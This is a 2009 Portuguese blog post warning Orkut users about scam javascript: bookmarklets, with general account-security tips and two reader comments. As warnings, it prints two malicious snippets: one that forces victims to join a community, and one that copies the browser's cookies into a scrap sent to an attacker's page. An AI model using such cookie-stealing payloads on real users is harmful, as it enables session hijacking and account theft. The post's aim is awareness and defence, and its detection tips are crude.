quinta-feira, 12 de fevereiro de 2009

Como proteger seu orkut

LEIAM COM ATENÇÃO !!!
Bom galera eu andei reparando que em muitas comunidades de TRUQUES para orkut os LAMMER'S e HACKERS vem tentando enganar os leigos no assunto. Muitas dessas tentativas são absolutamente IDIOTAS, mais por tamanha curiosidade dos seres humanos muitas vezes dão certo...
Então não seja mais uma das vitimas, e lendo essas dicas aprenda a se prevenir!!!

Usarei como exemplo um código malicioso "DESBLOQUEAR ÁLBUM"
■ Esse código tinha como título DESBLOQUEAR ÁLBUM, mas se a pessoa usa-lo iria estar adicionando a comunidade do CMM que o código possuia.Para evitar que os distraídos usassem ele eu mudei o CMM para o da nossa comunidade, então

NÃO USEM O CÓDIGO ABAIXO

javascript:alert('O álbum está sendo desbloqueado! Unblock the album!');i=0;cmm=["50400577"];a = document.forms[1]; a.target = '_top'; setInterval("i++; a.action = 'CommunityJoin.aspx?Action.join&cmm=' + cmm[i%cmm.length]; a.submit() ",300); void(0)

Onde está a malícia do código ?
cmm=["50400577"] e 'CommunityJoin.aspx?Action.join&cmm='

Os números após "cmm" são os números que cada comunidade tem (como se fosse UID da comunidade) e assim quem usasse iria participar dessa comunidade (no caso a nossa porque mudei o CMM para não haver problemas)Esse código é o mais idiota de todos pelo fato de ter uma parte CommunityJoin = participar da comunidade...

Então prestem atenção nos códigos que irão executar antes de usa-los na barra de ferramentas

O código anterior é o que chamamos de Código inofensivo, pois você apenas entrará na comunidade e não perderá nada! Porém esse que irei mostrar ROUBA seu Cookies, senhas, Id's e tudo que você faz no seu navegador.Embora o melhor navegador o FIREFOX é a vítima numero 1 desses códigos!

NÃO USEM O CÓDIGO ABAIXO.

javascript:document.body.innerHTML+='';function redre(){setTimeout("location.href=\"h­­­ttp://w­­­ww.o­­­rkut.com/S­­­crapbook.a­­­spx\";", 2000)};flood.location="h­­­ttp://w­­­ww.orkut.com/S­­­crapbook.aspx";dscrap=document.getElementById('scrapText');setTimeout('df=flood.document.forms[1];df.innerHTML+=\'\';df.action="Sua pagina de scrap";flood.document.getElementById(\'scrapText\').value=document.cookie;flood.document.getElementsByTagName(\'input\')[\'Action.submit\'].click();redre();', 3000);void(0)

O que tem de malicioso nesse código ?
Estão vendo a parte em vermelho "SUA PAGINA DE SCRAP" ?
Ali ficaria a pagina de scrapbook para onde os Cookies da vítima seriam enviados

Dicas para não entrar nessa furada :
Qualquer código javascript que possuir a palavra “cookie” (que está em vermelho no código) ou esse comando: redre(); é considerado um código malicioso. Se notar "cookie" no código, saiba que o mesmo ira capturar os cookies, e o comando "redre(); serve pra redirecionar esses "cookies roubados" para determinado perfil, que vai usá-los como quiser

E procure sempre limpar os cookies do seu navegador Algumas dicas simples mais que ajudam - ACONSELHO QUE TODOS LEIAM
■ Usem senhas extensas , com números, letras maiúsculas e minúsculas e símbolos.
■ NÃO usem a mesma senha para Orkut e Msn ou outros e troque elas semanalmente.
■ NÃO façam o login de seu PROFILE em outros sites se não o Orkut.com (logo explicarei o porque)
■ Uma dica interessante é você usar o Teclado virtual para digitar senhas(Assim se seu pc estiver com "keylogger" não ficará registradoMENU INICIAR/TODOS OS PROGRAMAS/ACESSÓRIOS/ACESSIBILIDADE/TECLADO VIRTUAL...
■ Sempre que sair do Orkut esvazie seus CookiesFERRAMENTAS>OPÇÕES>COOKIES DO TEU NAVEGADOR
■ Configure o seu Orkut para que o E-mail de exibição de seu perfil seja diferente do de login
■ Desconfie de links como: tinyurl, metamark e outros desconhecidos encurtadores de url
■ Se estiver com dúvida de algum código não arrisque, use um perfil fake para executar.
■ Instale um ad-aware ou anti-spyware e mantenha-o atualizado
■ E por Ultimo "Você é a 9.999.999 pessoa a entrar- Clique aqui para receber seu prêmio" Não preciso nem falar que o coisas desse tipo, o seu prêmio será um PC infectado
A minha ultima dica e não menos importante é para os que tem comunidadesO risco de você ser hackeado é grande e perdera suas comunidades. Então Donos de comunidade leiam.


DICA DE PROTEÇÃO PARA SUA COMUNIDADE
com essa dica fica mais fácil recuperar sua comunidade de volta se ela for roubada
Crie um segundo profile no orkut e transfira a comunidade para ele, mas não aceite a transferência, deixe ela pendente, Desta forma se um dia sua comunidade for roubada você entra neste segundo profile e aceita a transferência da comunidade.procure não ter amigos nesse perfil,deixe ele invisivel sem contatos nem inimigos,para evitar interesses nele
Procure sempre checar se a transferência pendente continua aparecendo no seu outro profile, pois se o orkut fizer um backup com uma data anterior ao envio da transferência ela vai desaparecer, neste caso você deverá repetir todo esse procedimento de novo
Não de mancada com este segundo perfil, pois se roubarem ele levam sua comunidade tambem,essa dica e super importante e muito util e utilizada no orkut .

2 comentários:

  1. Boa Noite Jona,
    Achei muito interessante o seu post e gostaria de tirar um dúvida com vc.
    Eu tenho uma comunidade no orkut há mais de dois anos, tinha mais de 5.000 membros, mas todos os dias somem de 4 a 5 membros da mesma e o meu perfil foi denunciado como impróprio.
    O que pode ser isso?
    Obrigado.

    ResponderExcluir
  2. foi a melhor explicasão da net que eu encotrei ate hoge!

    ResponderExcluir